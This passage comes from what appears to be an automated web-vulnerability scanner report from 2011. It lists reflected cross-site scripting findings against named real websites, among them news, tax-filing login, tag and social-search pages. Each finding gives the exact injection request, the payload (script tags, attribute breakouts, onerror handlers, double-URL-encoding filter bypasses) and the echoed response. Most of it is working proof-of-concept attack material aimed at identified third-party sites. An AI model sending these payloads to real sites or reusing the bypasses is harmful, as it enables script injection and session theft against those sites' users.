HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:04:04 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE' Set-Cookie: ToBeValidatedFrom=64d5c'-alert(1)-'bb8b0913587; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Set-Cookie: ToBeValidated=http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Set-Cookie: ad_simply_viewer=a7403c74-1385-4711-814e-7bccfbad72de; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 924
3.69. http://optimized-by.simply.com/play.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://optimized-by.simply.com
Path: /play.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b78'-alert(1)-'32df7692c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /play.html?code=19842;6812;5711;0&from=&e6b78'-alert(1)-'32df7692c67=1 HTTP/1.1 Host: optimized-by.simply.com Proxy-Connection: keep-alive Referer: http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:04:10 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE' Set-Cookie: ToBeValidatedFrom=; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Set-Cookie: ToBeValidated=http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Set-Cookie: ad_simply_viewer=85931e07-07d9-48c0-bfe8-054bf5eed928; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 927
The value of the Context request parameter is copied into the HTML document as plain text between tags. The payload 96e91<script>alert(1)</script>030f8640de8 was submitted in the Context parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/Frs.frs?Context=LOGENTRY96e91<script>alert(1)</script>030f8640de8&Source=csozne&Source_BC=10&Script=/LP/50552781/reg&_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 12:44:47 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 14:44:47 GMT; Path=/ Set-Cookie: JSESSIONID=6FC9B6B6BB8080C11021F6CC786504BE; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1224
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">java.lang.Exception: Unable to find context LOGENTRY96e91<script>alert(1)</script>030f8640de8</font> ...[SNIP]...
The value of the Script request parameter is copied into the HTML document as plain text between tags. The payload c977d<script>alert(1)</script>40099239016 was submitted in the Script parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/50552781/regc977d<script>alert(1)</script>40099239016&_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 12:44:47 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 14:44:47 GMT; Path=/ Set-Cookie: JSESSIONID=BCC35E50ADF79E8400F2E897678BBE9E; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1240
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">java.lang.Exception: Unable to load script: /LP/50552781/regc977d<script>alert(1)</script>40099239016</font> ...[SNIP]...
3.72. http://schoonermaggieb.net/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://schoonermaggieb.net
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77703"><script>alert(1)</script>54baad66ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77703\"><script>alert(1)</script>54baad66ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?77703"><script>alert(1)</script>54baad66ca7=1 HTTP/1.1 Host: schoonermaggieb.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3572c'-alert(1)-'7ac83c64202 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/website_monitoring_features.php3572c'-alert(1)-'7ac83c64202 HTTP/1.1 Host: secure.watchmouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 13:33:30 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: private, no-cache, must-revalidate, max-age=3600 Pragma: no-cache ETag: "0-en-554e289cf1bcc7b77a082c61324b2324" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::website_monitoring_features.php3572c'-alert(1)-'7ac83c64202'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]...
3.74. https://secure.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://secure.watchmouse.com
Path: /en/website_monitoring_features.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44dae'-alert(1)-'ea0be109e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/website_monitoring_features.php?44dae'-alert(1)-'ea0be109e7=1 HTTP/1.1 Host: secure.watchmouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:33:07 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: private, no-cache, must-revalidate, max-age=3600 Pragma: no-cache ETag: "0-en-92df66ca00bbb33979c55382314fe555" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::website_monitoring_features.php?44dae'-alert(1)-'ea0be109e7=1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e22ad"><script>alert(1)</script>045a6513e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoe22ad"><script>alert(1)</script>045a6513e24 HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:25 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=KGJ1BJVEM0432CUUCBVSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/favicon.icoe22ad"><script>alert(1)</script>045a6513e24?_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298900005171" method="post"> ...[SNIP]...
3.76. https://secure.www.denverpost.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://secure.www.denverpost.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494e5"><script>alert(1)</script>01b478acec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?494e5"><script>alert(1)</script>01b478acec=1 HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:10 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=JZHG3CWV0UOAGCUUCAYSFFA; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/favicon.ico?494e5"><script>alert(1)</script>01b478acec=1&_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298899990660" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b17b"><script>alert(1)</script>ac0959b7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration1b17b"><script>alert(1)</script>ac0959b7d/ HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:14 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=WQJHLBVOSBFJECUUCAYSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/registration1b17b"><script>alert(1)</script>ac0959b7d/?_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298899994747" method="post"> ...[SNIP]...
3.78. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smallbusiness.aol.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47117"><script>alert(1)</script>6668d5656e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?47117"><script>alert(1)</script>6668d5656e8=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.79. http://tags.gawker.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tags.gawker.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed446f74bb6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c0cf"><script>alert(1)</script>d446f74bb6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /index.php/3c0cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed446f74bb6f HTTP/1.1 Host: tags.gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.80. http://tags.gizmodo.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tags.gizmodo.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28d63d588c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81c51"><script>alert(1)</script>b28d63d588c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /index.php/81c51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28d63d588c HTTP/1.1 Host: tags.gizmodo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.81. https://taxes.hrblock.com/hrblock/login/ForgotAccountInfo.hrbx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://taxes.hrblock.com
Path: /hrblock/login/ForgotAccountInfo.hrbx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 5d434</script><script>alert(1)</script>f05d9cd5c2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hrblock/login/ForgotAccountInfo.hrbx?5d434</script><script>alert(1)</script>f05d9cd5c2f=1 HTTP/1.1 Host: taxes.hrblock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Jan 1700 06:00:00 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 28 Feb 2011 13:33:19 GMT Connection: close Content-Length: 2154
<script language='JavaScript' id='LoadScript'>//p=new X.Page({Title:"Forgot Account Information",RequiresSession:false,Buttons:[new X.NavigationButton({Type:"B"},[]),new X.NavigationButton({Type:"N"}, ...[SNIP]... faultTextBlockStyle"},[new X.Run({Text:" Both my username and password "},[])])])]),new X.TextBlock({Style:"DefaultTextBlockStyle"},[new X.HiddenField({Name:"ReqQueryString",Id:"ReqQueryString",Value:"5d434</script><script>alert(1)</script>f05d9cd5c2f=1"},[])]),new X.RefundOweMeter({},[new X.FederalRefundItem({Amount:"0"},["Refund"])])])</script> ...[SNIP]...
3.82. http://technorati.com/contact-us/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://technorati.com
Path: /contact-us/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87948"><script>alert(1)</script>0b0cfa17c56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact-us/?87948"><script>alert(1)</script>0b0cfa17c56=1 HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
3.83. http://theberry.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://theberry.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48452"><script>alert(1)</script>72a20de0cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48452\"><script>alert(1)</script>72a20de0cd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?48452"><script>alert(1)</script>72a20de0cd7=1 HTTP/1.1 Host: theberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:33:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://theberry.com/xmlrpc.php Link: <http://wp.me/FdpB>; rel=shortlink Content-Length: 99934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://theberry.com/?48452\"><script>alert(1)</script>72a20de0cd7=1"> ...[SNIP]...
3.84. http://thebrigade.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://thebrigade.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50599"><script>alert(1)</script>e927c624296 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50599\"><script>alert(1)</script>e927c624296 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?50599"><script>alert(1)</script>e927c624296=1 HTTP/1.1
Host: thebrigade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Feb 2011 13:33:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thebrigade.com/xmlrpc.php
Link: <http://wp.me/VeJm>; rel=shortlink
Content-Length: 99862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://thebrigade.com/?50599\"><script>alert(1)</script>e927c624296=1"> ...[SNIP]...
3.85. http://thethrottle.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://thethrottle.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d56e1"><script>alert(1)</script>76817ba5c5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d56e1\"><script>alert(1)</script>76817ba5c5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d56e1"><script>alert(1)</script>76817ba5c5d=1 HTTP/1.1
Host: thethrottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Feb 2011 13:33:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thethrottle.com/xmlrpc.php
Link: <http://wp.me/VeJh>; rel=shortlink
Content-Length: 99149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://thethrottle.com/?d56e1\"><script>alert(1)</script>76817ba5c5d=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81132%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e6e4e6723c69 was submitted in the REST URL parameter 2. This input was echoed as 81132</script><img src=a onerror=alert(1)>6e4e6723c69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/alleyinsider81132%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e6e4e6723c69 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Set-Cookie: utid=0e5797982ccf76bd99fba5e3431a6cda; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=e0cbce002617db3e3e131acac393917747011cba; path=/; expires=Mon, 07-Mar-2011 13:34:32 GMT; HttpOnly
Content-Length: 7154
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 05:39:32 -0800
Connection: close
Date: Mon, 28 Feb 2011 13:34:32 GMT
Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11016%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea46353a5139 was submitted in the REST URL parameter 2. This input was echoed as 11016</script><img src=a onerror=alert(1)>a46353a5139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/amnestyonline11016%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea46353a5139 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Set-Cookie: utid=98b8dcbd5b234996e518842eb5c985c6; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=5a6ebc628509a3f2b5ff5f04107d4de88601e4a5; path=/; expires=Mon, 07-Mar-2011 13:34:35 GMT; HttpOnly
Content-Length: 7161
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 05:39:35 -0800
Connection: close
Date: Mon, 28 Feb 2011 13:34:35 GMT
Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e278c%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e8e3902afbce was submitted in the REST URL parameter 2. This input was echoed as e278c</script><img src=a onerror=alert(1)>8e3902afbce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/teresajenkinse278c%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e8e3902afbce HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Content-Length: 7159
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 05:39:34 -0800
Set-Cookie: topsy_session=e43702d181826ddede27e7493ac02c2f8089c46b; path=/; expires=Mon, 07-Mar-2011 13:34:34 GMT; HttpOnly
Connection: close
Date: Mon, 28 Feb 2011 13:34:34 GMT
Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60da3%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e16901b5809c was submitted in the REST URL parameter 2. This input was echoed as 60da3</script><img src=a onerror=alert(1)>16901b5809c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/usarmy60da3%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e16901b5809c HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
